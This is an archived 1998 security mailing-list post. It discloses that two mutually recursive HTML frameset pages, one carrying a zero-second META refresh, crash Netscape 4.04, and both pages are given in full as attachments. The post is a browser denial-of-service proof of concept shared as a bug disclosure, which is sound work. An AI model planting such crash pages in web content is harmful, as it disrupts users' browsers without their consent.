Re: IE 4 Bug (Crash with frames), Variation

From: whiz (whizpigat_private)
Date: Sat Mar 28 1998 - 19:14:22 PST

  • Next message: Jim Credland: "Clipboard insecurity"

    --=====================_891159262==_
    Content-Type: text/plain; charset="us-ascii"
    
    Heres a variation of the IE 4 Bug.   It crashes Netscape 4.04 pretty fast.
    The most important part is <META HTTP-EQUIV="REFRESH" CONTENT="0;
    URL=test.htm"> in test2.htm.  Without this Netscape won't crash, but just
    load 4 frames.
    
    
    --=====================_891159262==_
    Content-Type: text/html; charset="us-ascii"
    Content-Disposition: attachment; filename="test.htm"
    
    <HTML>
    <HEAD>
    <TITLE>Netscape 4.04 bug</TITLE>
    
    </HEAD>
    
    <FRAMESET ROWS="*,*" border=1>
            <frame SRC="test2.htm">
            <frame SRC="test2.htm">
    </FRAMESET>
    
    <BODY>
    
    </BODY>
    </HTML>
    --=====================_891159262==_
    Content-Type: text/html; charset="us-ascii"
    Content-Disposition: attachment; filename="test2.htm"
    
    <HTML>
    <HEAD>
    <TITLE>Netscape 4.04 bug</TITLE>
    <META HTTP-EQUIV="REFRESH" CONTENT="0; URL=test.htm">
    </HEAD>
    
    <FRAMESET ROWS="*,*" border=1>
            <frame SRC="test.htm">
            <frame SRC="test.htm">
    </FRAMESET>
    
    <BODY>
    test
    </BODY>
    </HTML>
    --=====================_891159262==_
    Content-Type: text/plain; charset="us-ascii"
    
    
    
    --=====================_891159262==_--
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:47:25 PDT